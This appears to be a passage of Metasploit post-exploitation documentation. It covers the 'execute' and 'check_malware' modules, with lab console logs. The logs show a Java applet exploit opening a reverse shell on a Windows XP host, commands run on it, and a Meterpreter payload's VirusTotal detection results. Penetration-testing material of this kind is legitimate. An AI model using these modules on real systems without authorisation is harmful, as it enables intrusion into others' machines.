execute
This module will execute arbitrary commands to an open sessions. Works on Windows, Linux, OSX and Unix platforms.
msf post(execute) > [*] 10.10.0.100 java_jre17_exec - Java 7 Applet Remote Code Execution handling request [*] Sending stage (2976 bytes) to 10.10.0.100 [*] Command shell session 1 opened (10.10.0.151:4444 -> 10.10.0.100:1173) at 2012-08-31 15:06:06 -0400 msf post(execute) > show options Module options (post/multi/general/execute): Name Current Setting Required Description ---- --------------- -------- ----------- COMMAND echo hell > file.txt no The entire command line to execute on the session SESSION 1 yes The session to run this module on. msf post(execute) > run [*] Executing echo hell > file.txt on #>Session:shell 10.10.0.100:1173 (10.10.0.100) "Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator\Desktop>">... [*] Response: [*] Post module execution completed msf post(execute) > sessions -i 1 [*] Starting interaction with 1... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\administrator\Desktop> dir dir Volume in drive C has no label. Volume Serial Number is 2CB7-2817 Directory of C:\Documents and Settings\administrator\Desktop 08/31/2012 09:04 AM >DIR> . 08/31/2012 09:04 AM >DIR> .. 08/31/2012 09:04 AM 46 file.txt 12/29/2011 03:52 PM 70 portlist.txt 2 File(s) 1,431 bytes 2 Dir(s) 4,899,721,216 bytes free C:\Documents and Settings\administrator\Desktop>
malware_check
This module uploads a file to virustotal.com, and displays the scan results. It can also be run directly from within a meterpreter session. Works on Windows, Linux, OSX and Unix platforms.
msf post(check_malware) > show options
Module options (post/multi/gather/check_malware):
Name Current Setting Required Description
---- --------------- -------- -----------
APIKEY yes VirusTotal API key
REMOTEFILE C:\msfrev.exe yes A file to check from the remote machine
SESSION 1 yes The session to run this module on.
msf post(check_malware) > run
[*] 192.168.101.129 - Checking: C:\\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\msfrev.exe (38 / 55):
=====================================================================================================================================
Antivirus Detected Version Result Update
--------- -------- ------- ------ ------
ALYac true 1.0.1.5 Gen:Variant.Zusy.Elzob.8031 20151125
AVG true 16.0.0.4460 Agent 20151125
AVware true 1.5.0.21 Trojan.Win32.Swrort.B (v) 20151124
Ad-Aware true 12.0.163.0 Gen:Variant.Zusy.Elzob.8031 20151125
AegisLab false 1.5 20151125
Agnitum true 5.5.1.3 Trojan.Rosena.Gen.1 20151124
AhnLab-V3 true 2015.11.26.00 Trojan/Win32.Shell 20151125
Alibaba false 1.0 20151125
Arcabit true 1.0.0.624 Trojan.Zusy.Elzob.D1F5F 20151125
Avast true 8.0.1489.320 Win32:SwPatch [Wrm] 20151125
Avira true 8.3.2.4 TR/Crypt.EPACK.Gen2 20151125
Baidu-International true 3.5.1.41473 Trojan.Win32.Rozena.AM 20151124
BitDefender true 7.2 Gen:Variant.Zusy.Elzob.8031 20151125
Bkav false 1.3.0.7383 20151125
ByteHero false 1.0.0.1 20151125
CAT-QuickHeal true 14.00 Trojan.Swrort.A 20151125
CMC false 1.1.0.977 20151124
ClamAV true 0.98.5.0 Win.Trojan.MSShellcode-7 20151125
Comodo true 23654 TrojWare.Win32.Rozena.A 20151125
Cyren true 5.4.16.7 W32/Swrort.A 20151125
DrWeb true 7.0.16.10090 Trojan.Swrort.1 20151125
ESET-NOD32 true 12622 a variant of Win32/Rozena.AM 20151125
Emsisoft true 3.5.0.642 Gen:Variant.Zusy.Elzob.8031 (B) 20151125
F-Prot true 4.7.1.166 W32/Swrort.A 20151125
F-Secure true 11.0.19100.45 Gen:Variant.Zusy.Elzob.8031 20151125
Fortinet true 5.1.220.0 W32/Swrort.C!tr 20151125
GData true 25 Gen:Variant.Zusy.Elzob.8031 20151125
Ikarus true T3.1.9.5.0 Trojan.Win32.Swrort 20151125
Jiangmin false 16.0.100 20151124
K7AntiVirus true 9.212.17966 Backdoor ( 04c53cce1 ) 20151125
K7GW true 9.212.17968 Backdoor ( 04c53cce1 ) 20151125
Kaspersky true 15.0.1.10 HEUR:Trojan.Win32.Generic 20151125
Malwarebytes true 2.1.1.1115 Backdoor.Bot.Gen 20151125
...snip...
[*] Post module execution completed
meterpreter > run post/multi/gather/check_malware REMOTEFILE=C:\\msfrev.exe
[*] 192.168.101.129 - Checking: C:\Users\loneferret\Downloads\msfrev.exe...
[*] 192.168.101.129 - VirusTotal message: Scan finished, information embedded
[*] 192.168.101.129 - MD5: 88b90ef2641ed89aa9506264a46df29a
[*] 192.168.101.129 - SHA1: 9767f651321c5cac786312f59a1c046ac1e27ad3
[*] 192.168.101.129 - SHA256: 04fb3ba1ccb64371f75b0b54d1dc7f20dcef2c6f773d7682b3d7f57d4691d296
[*] Analysis Report: C:\\msfrev.exe (35 / 54):
=====================================================================================================================================
Antivirus Detected Version Result Update
--------- -------- ------- ------ ------
ALYac true 1.0.1.5 Gen:Variant.Zusy.Elzob.8031 20151125
AVG true 16.0.0.4460 Agent 20151125
AVware true 1.5.0.21 Trojan.Win32.Swrort.B (v) 20151124
Ad-Aware true 12.0.163.0 Gen:Variant.Zusy.Elzob.8031 20151125
AegisLab false 1.5 20151125
Agnitum true 5.5.1.3 Trojan.Rosena.Gen.1 20151124
..snip..